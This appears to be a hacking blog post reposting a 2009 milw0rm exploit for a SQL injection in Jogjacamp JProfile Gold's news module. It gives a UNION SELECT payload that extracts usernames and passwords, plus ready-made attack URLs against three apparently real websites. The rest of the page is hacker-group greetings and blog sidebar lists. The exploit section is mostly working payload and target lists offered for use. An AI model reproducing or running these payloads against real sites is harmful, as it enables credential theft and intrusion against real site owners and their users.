9:35 AM
secure your world
Jogjacamp JProfile Gold SQL Injection
by kecemplungkalen
Vendor : http://jogjacamp.com
bugs : /index.php?action=news.detail&id_news=
exploit : union select concat(username,0x3a,password),2,3 from phpss_account--
POC : http://www.titiandamai.org/index.php?action=news.detail&id_news=6%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20--
http://www.ligaindonesia.com/index.php?action=news.detail&id_news=1976%20%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20--
http://hermawan.net/index.php?action=news.detail&id_news=42%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20--
###############################################################
greetz : Allah
s3t4n and Paman aka Jack-
my family
and all Mainhack BrotherHood
jupe crew jangan ngegame melulu :p
# milw0rm.com [2009-03-03]
VIVA INDONESIAN CODER TEAM
Fear Nothing. Risk Everything.
skip to main |
skip to sidebar
Posted in:
Featured Video
Categories
- Art (1)
- Barrett Lyon (1)
- Bugs (16)
- Cables (3)
- Crime (1)
- DDoS (1)
- Defacing (4)
- Download (6)
- Downloads (1)
- EveryDNS (2)
- Facebook (1)
- GnackTrack (4)
- Google (6)
- Hacking (18)
- Havij (1)
- Joe Lieberman (1)
- John Muller (1)
- Julian Assange (3)
- Linux (1)
- Lyrics (7)
- Maria Ozawa (1)
- Married (1)
- md5 (4)
- mIRC (1)
- Nessus (1)
- News (26)
- OS (6)
- PayPal (1)
- Pirate Party (1)
- RC2 (1)
- Security (5)
- The Washington Post (1)
- Tips and Trick (34)
- Tools (11)
- Tutorial (40)
- Twitter (1)
- Video (7)
- WikiLeaks (5)
Blog Archive
-
▼
2009
(44)
-
▼
March
(8)
- Dream Theater -The Spirit Carries On
- Invision Power Board <= 2.1.4 (Register Users) Den...
- CMS WEBjump! Multiple SQL Injection Vulnerabilities
- Prevent DNS problems with this tip for Windows XP
- "This operation has been cancelled due to restrict...
- Jogjacamp JProfile Gold (id_news) Remote SQL Injec...
- Make a PHP info file
- SSH Explorer SSH Client
-
▼
March
(8)
0 komentar:
Post a Comment